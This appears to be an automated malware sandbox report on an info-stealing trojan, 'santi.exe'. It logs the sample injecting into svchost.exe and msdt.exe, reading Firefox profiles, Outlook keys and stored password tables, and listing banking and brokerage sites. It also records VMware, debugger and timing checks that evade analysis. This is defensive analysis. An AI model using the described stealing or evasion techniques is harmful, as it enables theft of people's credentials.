Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782EA0 NtAdjustPrivilegesToken
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782F60 NtCreateProcessEx
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782FA0 NtQuerySection
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782F90 NtProtectVirtualMemory
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782AB0 NtWaitForSingleObject
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04782B80 NtQueryInformationFile
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04783010 NtOpenDirectoryObject
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04783090 NtSetValueKey
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04783D70 NtOpenThread
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_04783D10 NtOpenProcessToken
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_004392D0 NtCreateFile
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_00439440 NtReadFile
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_00439530 NtDeleteFile
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_004395E0 NtClose
Source: C:\Windows\SysWOW64\msdt.exe, Code function: 11_2_00439740 NtAllocateVirtualMemory
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_00326606 CreateFileW, DeviceIoControl, CloseHandle
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_0031ACC5 _memset, DuplicateTokenEx, CloseHandle, OpenWindowStationW, GetProcessWindowStation, SetProcessWindowStation, OpenDesktopW, _wcscpy, LoadUserProfileW, CreateEnvironmentBlock, CreateProcessAsUserW, UnloadUserProfile, CloseWindowStation, CloseDesktop, SetProcessWindowStation, CloseHandle, DestroyEnvironmentBlock
Source: C:\Users\user\Desktop\santi.exe, Code function: 0_2_003279D3 ExitWindowsEx, InitiateSystemShutdownExW, SetSystemPowerState
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03287E54 appears 99 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03275130 appears 37 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 0322B970 appears 269 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032AEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 032BF290 appears 105 times
                Source: C:\Users\user\Desktop\santi.exeCode function: String function: 00306AC0 appears 42 times
                Source: C:\Users\user\Desktop\santi.exeCode function: String function: 0030F8A0 appears 35 times
                Source: C:\Users\user\Desktop\santi.exeCode function: String function: 002FEC2F appears 68 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 047CF290 appears 105 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04785130 appears 58 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 047BEA12 appears 86 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 04797E54 appears 102 times
                Source: C:\Windows\SysWOW64\msdt.exeCode function: String function: 0473B970 appears 277 times
                Source: santi.exe, 00000000.00000003.1291237018.00000000037C3000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs santi.exe
                Source: santi.exe, 00000000.00000003.1291422646.000000000396D000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs santi.exe
                Source: santi.exe Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/3@10/9
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0032CE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0031AB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0031B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0032E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00326532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0033C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_002E406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\santi.exe File created: C:\Users\user~1\AppData\Local\Temp\aut9282.tmp
                Source: santi.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\santi.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: msdt.exe, 0000000B.00000003.1914772603.00000000005FA000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000605000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000627000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.00000000005FA000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: santi.exe ReversingLabs: Detection: 60%
                Source: santi.exe Virustotal: Detection: 47%
                Source: unknown Process created: C:\Users\user\Desktop\santi.exe "C:\Users\user\Desktop\santi.exe"
                Source: C:\Users\user\Desktop\santi.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\santi.exe"
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Process created: C:\Windows\SysWOW64\msdt.exe "C:\Windows\SysWOW64\msdt.exe"
                Source: C:\Windows\SysWOW64\msdt.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\santi.exe Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: version.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\santi.exe Section loaded: ntmarta.dll
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Section loaded: wininet.dll
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Section loaded: fwpuclnt.dll
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Section loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\msdt.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\msdt.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
                Source: santi.exe Static file information: File size 1214464 > 1048576
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: santi.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: msdt.pdbGCTL source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: lavilIyGJqg.exe, 0000000A.00000002.3129958967.00000000009CE000.00000002.00000001.01000000.00000005.sdmp, lavilIyGJqg.exe, 0000000C.00000000.1798745572.00000000009CE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: santi.exe, 00000000.00000003.1274830080.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, santi.exe, 00000000.00000003.1292502476.0000000003840000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000007.00000002.1717067620.000000000339E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.1717067620.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1624933286.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1623193414.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, msdt.exe, 0000000B.00000003.1717001856.00000000043AE000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000003.1719316907.000000000455B000.00000004.00000020.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.00000000048AE000.00000040.00001000.00020000.00000000.sdmp, msdt.exe, 0000000B.00000002.3132861268.0000000004710000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: msdt.exe, 0000000B.00000002.3133665309.0000000004D3C000.00000004.10000000.00040000.00000000.sdmp, msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000C.00000002.3133057463.00000000031CC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.2038827866.000000000A32C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: msdt.pdb source: svchost.exe, 00000007.00000003.1684331959.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.1684439953.0000000002C7A000.00000004.00000020.00020000.00000000.sdmp, lavilIyGJqg.exe, 0000000A.00000003.1654470150.0000000000F65000.00000004.00000020.00020000.00000000.sdmp
                Source: santi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: santi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: santi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: santi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: santi.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_002FE01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00306B05 push ecx; ret 0_2_00306B18
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00E18C59 push eax; retf 0_2_00E18C57
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00E18C2F push eax; retf 0_2_00E18C57
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_006F3000 push eax; ret 7_2_006F3002
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00707281 push cs; ret 7_2_00707282
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00708B78 push es; retf 7_2_00708B89
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00708B98 push es; retf 7_2_00708B89
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_006F1540 push esi; retf E746h 7_2_006F186F
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0070663A pushad ; retf 7_2_00706640
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00714F93 push edi; ret 7_2_00714F9E
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_032309AD push ecx; mov dword ptr [esp], ecx 7_2_032309B6
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Code function: 10_2_053E7EBF push ss; retf 10_2_053E7EC1
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Code function: 10_2_053E8EEF pushad ; retf 10_2_053E8EF5
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Code function: 10_2_053E8060 push 2B3FE2CEh; ret 10_2_053E808E
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Code function: 10_2_053F7848 push edi; ret 10_2_053F7853
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe Code function: 10_2_053E9B36 push cs; ret 10_2_053E9B37
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_047409AD push ecx; mov dword ptr [esp], ecx 11_2_047409B6
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_0042C1DF push FFFFFFD8h; retf 11_2_0042C203
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_0042427E push cs; ret 11_2_0042427F
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_00422607 push ss; retf 11_2_00422609
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_004227A8 push 2B3FE2CEh; ret 11_2_004227D6
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_00423637 pushad ; retf 11_2_0042363D
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_0042B9E1 push ebx; iretd 11_2_0042B9E2
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_00425B75 push es; retf 11_2_00425B86
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_00425B95 push es; retf 11_2_00425B86
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_00429F55 push ebp; iretd 11_2_00429F57
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_00431F90 push edi; ret 11_2_00431F9B
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_043AB5F8 push edi; retf 11_2_043AB64E
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_043AB5ED push edi; retf 11_2_043AB64E
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_043AB64F push edi; retf 11_2_043AB64E
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_043B5272 push eax; ret 11_2_043B5274
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00348111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_002FEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0030123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                Source: C:\Users\user\Desktop\santi.exe Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                Source: C:\Users\user\Desktop\santi.exe API/Special instruction interceptor: Address: E181C4
                Source: santi.exe, 00000000.00000002.1294074530.0000000000FA6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXEB
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0327096E rdtsc
                Source: C:\Users\user\Desktop\santi.exe Evaded block: after key decision graph_0-93172
                Source: C:\Users\user\Desktop\santi.exe API coverage: 4.4 %
                Source: C:\Windows\SysWOW64\svchost.exe API coverage: 0.7 %
                Source: C:\Windows\SysWOW64\msdt.exe API coverage: 2.7 %
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe TID: 7784 Thread sleep time: -50000s >= -30000s
                Source: C:\Program Files (x86)\MFZHvabWtuJetfpcmtpejNmfKqSQVzLyHOuSFTAjQDeWYaSiiiAFJUuLKRfoRTNAN\lavilIyGJqg.exe TID: 7784 Thread sleep time: -31500s >= -30000s
                Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00326CA9 GetFileAttributesW,FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_003260DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_003263F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0032EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0032F56F FindFirstFileW,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_0032F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00331B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00331C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00331F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
                Source: C:\Windows\SysWOW64\msdt.exe Code function: 11_2_0042C730 FindFirstFileW,FindNextFileW,FindClose
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_002FDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo
                Source: msdt.exe, 0000000B.00000002.3135470132.0000000007787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMware
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: 73272964.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: 73272964.11.dr Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: 73272964.11.dr Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: AMC password management pageVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: 73272964.11.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: 73272964.11.dr Binary or memory string: discord.comVMware20,11696492231f
                Source: msdt.exe, 0000000B.00000002.3129214060.0000000000582000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.2044321574.000001EE4A39C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 73272964.11.dr Binary or memory string: global block list test formVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: dev.azure.comVMware20,11696492231j
                Source: 73272964.11.dr Binary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: 73272964.11.dr Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: 73272964.11.dr Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: 73272964.11.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: lavilIyGJqg.exe, 0000000C.00000002.3131631693.000000000139F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll1
                Source: 73272964.11.dr Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: 73272964.11.dr Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: 73272964.11.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: 73272964.11.dr Binary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: msdt.exe, 0000000B.00000002.3135470132.0000000007787000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: image_urlVARCHARVMware
                Source: 73272964.11.dr Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: 73272964.11.dr Binary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: 73272964.11.dr Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: 73272964.11.dr Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\santi.exe API call chain: ExitProcess graph end node graph_0-92959
                Source: C:\Windows\SysWOW64\svchost.exe Process information queried: ProcessInformation
                Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\msdt.exe Process queried: DebugPort
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0327096E rdtsc
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_00707743 LdrLoadDll
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00336AAF BlockInput
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_002E3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00313920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_002FE01E LoadLibraryA,GetProcAddress
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00E18490 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00E18430 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\santi.exe Code function: 0_2_00E16DE0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0326A30B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_0322C310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_03250310 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_032D437C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe Code function: 7_2_032B2349 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov eax, dword ptr fs:[00000030h]7_2_032B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 7_2_032B035C mov ecx, dword ptr fs:[00000030h]7_2_032B035C
